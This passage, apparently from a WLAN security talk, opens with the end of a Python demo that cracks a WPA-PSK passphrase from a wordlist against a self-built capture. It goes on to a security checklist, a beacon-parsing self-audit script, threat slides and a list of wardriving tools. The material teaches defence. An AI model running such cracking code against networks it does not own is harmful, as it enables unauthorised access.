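    return dict(ssid=ssid, aa=aa, spa=spa, anonce=anonce, snonce=snonce,
                eapol=eapol, mic=eapol_mic(kck, eapol, wpa2), wpa2=wpa2)


if __name__ == "__main__":
    # IEEE 802.11i test vector: passphrase "password", SSID "IEEE"
    print(pmk_from_passphrase("password", "IEEE").hex())
    cap = make_capture("correct horse battery", "HomeNet")
    print("cracked:", crack_psk(["123456", "letmein", "correct horse battery"], **cap))
```

The 4096-iteration PBKDF2 is the only thing slowing the attacker down, and it is per candidate, not per network: a long random passphrase (not a dictionary word plus digits) and a non-default SSID are what make the search infeasible.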

Advanced WLAN Security: Topology Options
- Treat all wireless communication as insecure
- Put the AP on the "unsafe" side of the firewall, with the wired LAN on the "safe" side
- Use a VPN (private tunnel) from the wireless client, across the untrusted segment or the Internet, to reach the internal network; the firewall then only needs to admit the VPN protocol from the AP's subnet
- Impractical for SOHO networks (expensive; throughput hit)
[Diagram: Firewall separating the "Safe Side" (wired LAN) from the "Unsafe Side" (AP)]

Step 5: CSE = Continuing Security Education
- All users should keep up with major security developments, including WLAN security
- Excellent resources:
  - Internet Storm Center
  - News.com
  - Wireless News Factor
  - WiFi Planet
  - NetworkWorldFusion

Future Wireless Security Issues 2
- Privacy: sniffing your car's radio stations
- "Red Means Stop, Ya Moron!": 802.11p
- DoS: wireless jammers for Jesus
- Wireless viruses: don't get stung by Mosquitoes
- RFIDs: the next security threat?

Privacy: Sniffing your car's radio
Device sniffs what radio station you are listening to

"Hey, buddy, I'm talking to you"
- 802.11p is a new IEEE spec to implement Wi-Fi(R) for vehicles
- "Emergency vehicles might use broadcast via wireless to change traffic signals in order to speed themselves along. Cars might also "communicate" with one another, as an exchange of Wi-Fi signals makes it possible to sound proximity alerts when two vehicles come too close to one another."
- Just imagine the potential for chaos when criminals can change traffic lights remotely, or when pranksters activate all the proximity alerts simultaneously… (any such signal that is not authenticated can be replayed or forged by anyone with a radio)

DoS: Wireless Jammers for Jesus
Mexico: cell phone jammers installed in churches…would likely nuke nearby WiFi as well (if the jammer also sweeps the 2.4 GHz band; a cellular-only jammer leaves 802.11b/g alone)…

Don't Get Stung
- Copy protection built into the "smart" cellphone game "Mosquitoes" was rewritten as a Trojan that calls expensive premium-rate numbers, using the embedded Symbian OS
- "Sooner or later, I expect I will be advising people not to run unknown applications for their refrigerators and cars," he says. "It is becoming more of a danger as we embed OS into more of our lives." --Panda Software CTO Patrick Hinojosa

RFID Security: Brave New World?
- RFIDs are poised to become ubiquitous
- RFIDs have essentially no security: most tags answer any reader without authentication, so they can be read, tracked or cloned
- "The thinking is, security is a secondary issue right now that will be fixed once deployments are underway" – Jeff Woods, Gartner Research Director
- Ya, that strategy has worked so well for Windows XP, WEP, Iraq…

WLAN Security Summary (rows follow the talk's Steps 1-4)
Physical security ..... Prevent theft; BIOS password; encrypt files; back up data; disaster plan
Wireless policy ....... Implement and enforce a wireless security AUP/TOS
OS/firmware updates ... Patch the OS frequently to plug security holes; read the media for new WLAN exploits
MAC filtering ......... Implement MAC filtering
SSID .................. Change the default; don't broadcast
AP admin password ..... Change the default admin login/password; disable remote admin
WEP ................... Only if no WPA; rotate keys manually
WPA ................... Implement now; choose a secure PSK
Key rotation .......... Got WPA? Weekly, or automatically
WPA2 .................. = 802.1X, 802.11i, RSN; VPN + RADIUS for enterprises

WLAN Security Basics Checklist
- Pay attention to the geographical location of the AP (parking lot coverage)
- Disable file & print sharing if not needed; never share the root of a drive
- Disable SSID broadcasting (default = enabled for most products); note this only hides the name from casual scanners, since probe and association frames still carry the SSID in the clear
- Change the SSID to something non-default and boring (the SSID also salts the WPA-PSK key derivation, so a default SSID lets attackers reuse precomputed tables)
- Upgrade the firmware of AP/client to increase security (WPA)
- Change the default admin login/password for the AP; disable remote admin
- Configure the AP to enable MAC address filtering (not perfect, yes: MAC addresses are sent in the clear and are trivially spoofed, so this stops only the casual visitor)
- Enable WPA PSK now! For enterprises: RADIUS, WPA2
- Only use WEP as a last resort (legacy hardware; rotate keys often)
- Wardrive yourself to audit your security (got a rogue teenager AP?)
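What your own wardrive actually reveals, as an added example that is not from the original talk: a parser that classifies 802.11 beacon frames as Open/WEP/WPA/WPA2 from the Privacy capability bit and the RSN and WPA information elements, then audits the result against an inventory of your own APs, flagging rogue, open/WEP, default-SSID and "hidden"-SSID networks. The frames, BSSIDs, SSIDs and inventory are constructed for the demo; a real audit would feed in frames from a monitor-mode capture.

```python
"""Classify what a wardriver sees from beacon frames and audit it against a
known-AP inventory. Added example; beacons are constructed, not captured."""

CIPHER = {1: "WEP-40", 2: "TKIP", 4: "CCMP", 5: "WEP-104"}
AKM = {1: "802.1X", 2: "PSK"}
RSN_OUI = b"\x00\x0f\xac"    # IEEE 802.11i suite selectors
WPA_OUI = b"\x00\x50\xf2"    # Wi-Fi Alliance (WPA v1) suite selectors
DEFAULT_SSIDS = {"linksys", "default", "netgear", "dlink", "wireless", "wlan"}


def parse_ies(data: bytes):
    """Split the tagged-parameter area into (element id, body) pairs."""
    ies, i = [], 0
    while i + 2 <= len(data):
        eid, n = data[i], data[i + 1]
        ies.append((eid, data[i + 2:i + 2 + n]))
        i += 2 + n
    return ies


def parse_suites(body: bytes, oui: bytes):
    """body = group suite || count || pairwise suites || count || AKM suites."""
    def name(sel, table):
        return table.get(sel[3], "?") if sel[:3] == oui else "vendor"
    group = name(body[0:4], CIPHER)
    n = int.from_bytes(body[4:6], "little")
    pairwise = [name(body[6 + 4 * k:10 + 4 * k], CIPHER) for k in range(n)]
    off = 6 + 4 * n
    m = int.from_bytes(body[off:off + 2], "little")
    akms = [name(body[off + 2 + 4 * k:off + 6 + 4 * k], AKM) for k in range(m)]
    return group, pairwise, akms


def classify_beacon(frame: bytes) -> dict:
    """Header: FC(2) dur(2) DA(6) SA(6) BSSID(6) seq(2); fixed fields:
    timestamp(8) interval(2) capability(2); then information elements."""
    if frame[0] != 0x80:
        raise ValueError("not a beacon frame")
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])
    privacy = bool(int.from_bytes(frame[34:36], "little") & 0x0010)
    ies = parse_ies(frame[36:])
    ssid = next((b for e, b in ies if e == 0), b"")
    channel = next((b[0] for e, b in ies if e == 3 and b), None)
    rsn = next((b for e, b in ies if e == 48), None)
    wpa = next((b for e, b in ies if e == 221 and b[:4] == WPA_OUI + b"\x01"), None)
    if rsn is not None:                       # RSN IE: version, then suites
        sec, (group, pairwise, akms) = "WPA2", parse_suites(rsn[2:], RSN_OUI)
    elif wpa is not None:                     # vendor IE: OUI+type, version, suites
        sec, (group, pairwise, akms) = "WPA", parse_suites(wpa[6:], WPA_OUI)
    elif privacy:                             # Privacy bit with no RSN/WPA IE = WEP
        sec, group, pairwise, akms = "WEP", "WEP", [], []
    else:
        sec, group, pairwise, akms = "OPEN", "none", [], []
    return {"bssid": bssid, "ssid": ssid.decode("utf-8", "replace"),
            "hidden": not ssid.strip(b"\x00"), "channel": channel,
            "security": sec, "group": group, "pairwise": pairwise, "akm": akms}


def audit(frames, inventory) -> list:
    """Findings a self-wardrive should raise, per the checklist above."""
    findings = []
    for ap in map(classify_beacon, frames):
        tag = f"{ap['bssid']} {ap['ssid']!r}"
        if ap["bssid"] not in inventory:
            findings.append(f"ROGUE: {tag} not in AP inventory")
        if ap["security"] in ("OPEN", "WEP"):
            findings.append(f"WEAK: {tag} is {ap['security']}")
        if ap["ssid"].lower() in DEFAULT_SSIDS:
            findings.append(f"DEFAULT-SSID: {tag}")
        if ap["hidden"]:
            findings.append(f"HIDDEN: {ap['bssid']} hides its SSID (cosmetic only)")
    return findings


def ie(eid: int, body: bytes) -> bytes:
    return bytes([eid, len(body)]) + body


def build_beacon(bssid: bytes, ssid: bytes, channel: int, security: str) -> bytes:
    """Constructed beacon; security in {open, wep, wpa-psk-tkip, wpa2-psk-ccmp}."""
    hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    cap = 0x0001 | (0x0010 if security != "open" else 0)   # ESS, Privacy
    fixed = bytes(8) + (100).to_bytes(2, "little") + cap.to_bytes(2, "little")
    ies = ie(0, ssid) + ie(1, b"\x82\x84\x8b\x96") + ie(3, bytes([channel]))
    if security == "wpa2-psk-ccmp":
        ies += ie(48, b"\x01\x00" + RSN_OUI + b"\x04" + b"\x01\x00" + RSN_OUI + b"\x04"
                  + b"\x01\x00" + RSN_OUI + b"\x02" + b"\x00\x00")
    elif security == "wpa-psk-tkip":
        ies += ie(221, WPA_OUI + b"\x01" + b"\x01\x00" + WPA_OUI + b"\x02" + b"\x01\x00"
                  + WPA_OUI + b"\x02" + b"\x01\x00" + WPA_OUI + b"\x02")
    return hdr + fixed + ies


SAMPLE_FRAMES = [   # constructed "capture": made-up BSSIDs and SSIDs
    build_beacon(bytes.fromhex("001122334455"), b"ClinicNet", 6, "wpa2-psk-ccmp"),
    build_beacon(bytes.fromhex("001122334466"), b"linksys", 6, "open"),
    build_beacon(bytes.fromhex("001122334477"), b"", 11, "wep"),
    build_beacon(bytes.fromhex("001122334488"), b"Guest", 1, "wpa-psk-tkip"),
]
INVENTORY = {"00:11:22:33:44:55", "00:11:22:33:44:77", "00:11:22:33:44:88"}

if __name__ == "__main__":
    for line in audit(SAMPLE_FRAMES, INVENTORY):
        print(line)
```

The security class comes from what the AP advertises, which is all a wardriver needs: a hidden SSID still shows up as a beacon with an empty name, and WEP is identifiable from the Privacy bit alone.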

The Tao of Network Security: Information Access : Information Denial

Addendum: It's the Basics, Stupid

Remember: Common Threats Are Common!
"Wired" attacks are still much more common than WLAN exploits:
- Buffer overflow attacks based on Windows vulnerabilities (increasingly zero-day exploits): Sasser, CHM, etc.
- Phishing for passwords and bank accounts (rapidly increasing sophistication)
- MS Outlook/OE exploits: worms, viruses, blended threats
- Hostile websites: spyware, malware, browser hijacking
- Keystroke loggers: disgruntled employees, spouses, kids
- IM attacks: embedded malicious URLs, spim, predators…

Are Most Users too Stupid for the Internet?
Why not require a license for Internet access? Wired article: "Are You Too Stupid to Surf?"
Several downsides:
- People don't trust the government (look at the furor over the TIA initiative)
- Money
- Your grandma wouldn't pass the test…ever.
- If stupid Americans are kept offline, how about the rest of the world we haven't "liberated"…yet?

Are Most Users too Stupid for the Internet?
How to get 0wn3d in 8 easy steps:
1. Never update your anti-virus program's definitions
2. In fact, let the free version on your new computer expire
3. Click on all attachments with wild abandon
4. Never use a firewall (equivalent: the Windows firewall only)
5. Keep thinking that OS security updates are for girlie men
6. Go to naughty sites and install all "required" programs
7. Use insecure, older versions of apps due to nostalgia
8. Ignore computer security alerts in the news (news.com)

References

Online Resources: WLAN Specifications
- Wi-Fi(TM) Alliance (formerly WECA):
- IEEE 802.11i:
- restricted:
- List of interesting unrestricted IEEE documents:
- Official specs:
- IEEE 802.11 communications overview: ffo.de/systems/Doc/Vorlesung/MC/ %DCbung/Gruppe7-Hiperlan/0130khun.pdf
- HiSWAN:
- Avian IP Transport Protocol (RFC 1149):

Wardriving Software
- NetStumbler
- MacStumbler
- BSDAirtools
- AirSnort
- Kismet
- Wellenreiter
Lots of other tools:


Online Resources: Basic Security
- Security FAQ (ISS) (old):
- Specifications:
- WEP Insecurity: (no longer on: )
- WPA/WPA2:
- Wardriving: ; Netstumbler:
- Wireless Glossary: (heh heh)
- Build your own Cantenna:

Online Resources: Advanced WLAN Security / Continuing Security Education
- SANS:
- Internet Storm Center:
- Wireless LAN Security Site:
- News.com
- Wireless News Factor
- WiFi Planet
- NetworkWorldFusion
- Google it: search Google for "WLAN security" and/or "WiFi security"
- Cool list of WLAN security links:
- Still more whitepapers:

Online Resources: AFH Topics
- People are stupid: "Wireless Equivalent Privacy":
- People are stupid 2: "Wireless Encryption Protocol":
- HAARP: ; ECHELON: pdf/rapport_echelon_en.pdf
- TEMPEST:


Offline Resources: Books/Articles, Computer Security Essentials
- Skoudis, Ed, Counter Hack, Upper Saddle River, NJ: Prentice Hall PTR, ISBN (amazing book! dozens of black hat techniques with countermeasures)
- Cheswick WR, Bellovin SM, Firewalls and Internet Security: Repelling the Wily Hacker, New York: Addison-Wesley Publishing Company, ISBN (a classic)
- Chapman, D. Brent and Zwicky, Elizabeth D., Building Internet Firewalls, Sebastopol, CA: O'Reilly & Associates, ISBN (first edition includes an excellent appendix on the basics of the ISO/OSI and TCP/IP stacks)
- Anonymous, Maximum Security, Fourth Ed., Indianapolis: SAMS Publishing, Dec 2002 (excellent resource)

Offline Resources: Books/Articles, WLAN Security
- Duntemann J, Jeff Duntemann's Drive-by Wi-Fi Guide, Scottsdale: Paraglyph Press, ISBN (very readable & entertaining; most practical 3-space reference thus far)
- Peikari C, Fogie S, Wireless Maximum Security, Indianapolis: Sams Publishing, ISBN (contains some errors [er, "Wireless Equivalent Privacy"? To paraphrase the song, 1/3 ain't good.])
- Edney J, Arbaugh WA, Real 802.11 Security: Wi-Fi Protected Access and 802.11i, Boston (etc.): Addison-Wesley, 2004 (almost incomprehensible at times, but a good reference)
- Vladimirov A, Gavrilenko K, Mikhailovsky A, Wi-Foo: The Secrets of Wireless Hacking, Boston (etc.): Addison-Wesley, 2004 (good overview of WLAN security from the black hat perspective; grammatical issues)